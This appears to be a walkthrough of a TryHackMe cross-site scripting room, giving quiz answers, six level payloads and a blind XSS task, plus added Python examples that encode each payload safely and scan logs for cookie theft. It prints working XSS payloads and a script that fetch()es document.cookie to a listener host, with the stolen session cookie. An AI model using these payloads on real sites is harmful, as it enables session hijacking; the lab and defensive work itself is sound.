Cross-site Scripting

    • What does XSS stand for?

    Answer : Cross-site Scripting

    • Which document property could contain the user's session token?

    Answer : document.cookie

    • Which JavaScript method is often used as a Proof Of Concept?

    Answer : alert

    • Where in a URL is a good place to test for reflected XSS?

    Answer : Parameters

    • How are stored XSS payloads usually stored on a website?

    Answer : database

    • What unsafe JavaScript method is good to look for in source code?

    Answer : eval()

    • What tool can you use to test for Blind XSS?

    Answer : xsshunter

    • What type of XSS is very similar to Blind XSS?

    Answer : Stored XSS

    • What is the flag you received from level six?

    LEVEL 1 : You just need to alert() the keyword THM :

    <script>alert('THM');</script>

    LEVEL 2 : You need to escape <h2>Hello, <input value="johny"></h2>

    "><script>alert('THM');</script>

    LEVEL 3 : You need to escape <h2>Hello, <textarea>meee</textarea></h2>

    </textarea><script>alert('THM');</script>

    LEVEL 4 : You need to break out of a JavaScript string inside a script block: document.getElementsByClassName('name')[0].innerHTML='hey you';

    ';alert('THM');//

    LEVEL 5 : A filter is applied that removes the keyword "script" in a single pass, so splitting the word around a second copy of it survives the removal :

    <sscriptcript>alert('THM');</sscriptcript>

    LEVEL 6 : You need to break out of the src attribute of an image tag and add an event handler: <img src="/images/cat.jpg">

    /images/cat.jpg" onload="alert('THM');

    Answer : THM{XSS_MASTER}
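    The six levels above each break out of a different output context (text between tags, a quoted attribute, a textarea, a JavaScript string, a denylist filter, an image src attribute). The block below is an added example that is not part of the TryHackMe room or this write-up: it takes the six level payloads as constructed input and shows the context-specific output encoding that neutralises each one, alongside the single-pass "script" filter that level 5 defeats. It uses only the Python standard library; the render_* function names and the PAYLOADS table are my own.

```python
import html
import json

# Constructed input: the six level payloads from the walkthrough, keyed by the
# output context each one targets.
PAYLOADS = {
    "text": "<script>alert('THM');</script>",
    "attribute": "\"><script>alert('THM');</script>",
    "textarea": "</textarea><script>alert('THM');</script>",
    "js_string": "';alert('THM');//",
    "filtered": "<sscriptcript>alert('THM');</sscriptcript>",
    "img_src": "/images/cat.jpg\" onload=\"alert('THM');",
}


def naive_strip_script(value: str) -> str:
    """The kind of denylist filter level 5 defeats: one pass removing the word 'script'."""
    return value.replace("script", "")


def encode_for_html_text(value: str) -> str:
    """Safe between tags (levels 1, 3, 5): <, > and & become entities."""
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    """Safe inside a quoted attribute (levels 2, 6): both quote characters are encoded too."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Safe as a JavaScript string literal inside a <script> block (level 4).
    json.dumps gives a quoted, backslash-escaped literal; <, > and & are then
    escaped so the HTML parser can never see a closing </script> inside it."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_greeting(name: str) -> str:            # level 1 sink, hardened
    return f"<h2>Hello, {encode_for_html_text(name)}</h2>"


def render_input(name: str) -> str:               # level 2 sink, hardened
    return f'<h2>Hello, <input value="{encode_for_html_attribute(name)}"></h2>'


def render_textarea(name: str) -> str:            # level 3 sink, hardened
    return f"<h2>Hello, <textarea>{encode_for_html_text(name)}</textarea></h2>"


def render_script(name: str) -> str:              # level 4 sink, hardened
    # The room's sink assigns to innerHTML; even with a correct string literal that
    # remains an HTML-injection sink, so the hardened version writes textContent.
    return ("<script>document.getElementsByClassName('name')[0].textContent="
            f"{encode_for_js_string(name)};</script>")


def render_image(src: str) -> str:                # level 6 sink, hardened
    # Attribute encoding stops the break-out; a real application should also
    # allowlist the path so only expected image URLs reach the attribute at all.
    return f'<img src="{encode_for_html_attribute(src)}">'


def script_tag_count(rendered: str) -> int:
    """Number of <script openings in a rendered fragment (used to show no tag was injected)."""
    return rendered.lower().count("<script")


if __name__ == "__main__":
    print("level 5 filter output :", naive_strip_script(PAYLOADS["filtered"]))
    print("level 5 encoded output:", encode_for_html_text(PAYLOADS["filtered"]))
    for label, out in [("1", render_greeting(PAYLOADS["text"])),
                       ("2", render_input(PAYLOADS["attribute"])),
                       ("3", render_textarea(PAYLOADS["textarea"])),
                       ("4", render_script(PAYLOADS["js_string"])),
                       ("6", render_image(PAYLOADS["img_src"]))]:
        print(f"level {label}:", out)
```

Run it to see that the denylist turns `<sscriptcript>` straight back into `<script>`, while every encoded rendering keeps the payload as inert text; the only `<script` left in any output is the page's own script block in level 4.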

    TASK 8 : Practical Example (Blind XSS)
    • What is the value of the staff-session cookie?

    Launch a listener on the KALI machine :

    nc -lnvp 9001

    Then create a new ticket with the payload :

    </textarea><script>fetch('http://10.10.127.52:9001?cookie=' + btoa(document.cookie) );</script>

    You'll get this in the listener :

    root@ip-10-10-127-52:~# nc -lnvp 9001
    Listening on [0.0.0.0] (family 0, port 9001)
    Connection from 10.10.232.24 39680 received!
    GET /?cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ== HTTP/1.1
    Host: 10.10.127.52:9001
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/89.0.4389.72 Safari/537.36
    Accept: */*
    Origin: http://172.17.0.1
    Referer: http://172.17.0.1/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US

    Decoding this base64 gives you the staff-session cookie :

    Answer : 4AB305E55955197693F01D6F8FD2D321
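    The callback captured by the listener carries the cookie base64-encoded in a query parameter, which is exactly the pattern a defender can look for in web-server or egress logs. The block below is an added example that is not part of the room or this write-up: it parses request lines like the one captured above (the first sample line is that request, the second is a constructed benign request for contrast), base64-decodes each query parameter value, and reports any value that decodes to cookie pairs. It uses only the Python standard library; the function names are my own.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the request line the netcat listener received, plus one
# ordinary request that must not be flagged.
SAMPLE_REQUEST_LINES = [
    "GET /?cookie=c3RhZmYtc2Vzc2lvbj00QUIzMDVFNTU5NTUxOTc2OTNGMDFENkY4RkQyRDMyMQ== HTTP/1.1",
    "GET /search?q=cats&page=2 HTTP/1.1",
]

# One or more "name=value" pairs joined by "; ", the shape document.cookie returns.
COOKIE_PAIRS = re.compile(r"^[\w-]+=[^;]+(; [\w-]+=[^;]+)*$")


def try_base64(value: str):
    """Return the decoded text if value is strict base64 that decodes to printable ASCII, else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_exfiltrated_cookies(request_lines):
    """Scan HTTP request lines for query parameters whose base64 payload looks like cookie pairs.

    Returns a list of {"param": <query name>, "cookies": {<cookie name>: <value>}} findings.
    Note: parse_qs decodes '+' as a space, so base64 values containing '+' would need
    to arrive percent-encoded; the sample line contains none.
    """
    findings = []
    for line in request_lines:
        parts = line.split(" ")
        if len(parts) != 3 or parts[0] not in ("GET", "POST"):
            continue                      # not a request line
        query = urlsplit(parts[1]).query
        for param, values in parse_qs(query).items():
            for value in values:
                decoded = try_base64(value)
                if decoded and COOKIE_PAIRS.match(decoded):
                    cookies = dict(pair.split("=", 1) for pair in decoded.split("; "))
                    findings.append({"param": param, "cookies": cookies})
    return findings


if __name__ == "__main__":
    for finding in find_exfiltrated_cookies(SAMPLE_REQUEST_LINES):
        print(f"parameter {finding['param']!r} carried cookies: {finding['cookies']}")
```

On the captured request this reports the staff-session cookie with the value given as the answer above; the benign search request produces nothing because "cats" does not decode to printable text and "2" is not valid base64. A cookie that the browser can hand to fetch() like this is one that was set without the HttpOnly flag, which is the first thing to check when such a finding appears.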